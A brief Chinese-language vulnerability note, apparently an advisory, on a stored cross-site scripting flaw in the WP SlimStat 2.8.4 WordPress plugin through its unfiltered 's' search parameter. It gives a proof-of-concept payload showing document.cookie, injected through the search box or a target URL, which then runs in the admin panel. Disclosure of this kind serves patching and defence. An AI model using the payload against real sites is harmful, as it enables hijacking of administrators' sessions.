WordPress WP SlimStat是实时Web分析插件。 WordPress WP SlimStat 2.8.4及之前版本没有正确过滤wp-content/plugins/wp-slimstat/admin/view/panel1.php内index.php的 "s" 参数值，可被利用插入任意HTML和脚本代码。

查看版本：wordpress\wp-content\plugins\wp-slimstat\readme.txt

Stable tag: 2.8.4

利用方法如下：

前台搜索框提交XSS CODE:<script>alert(document.cookie);</script>

或URL：http://Target/wordpress/index.php?s=<script>alert(document.cookie);</script>

后台/wp-admin/index.php?page=wp-slimstat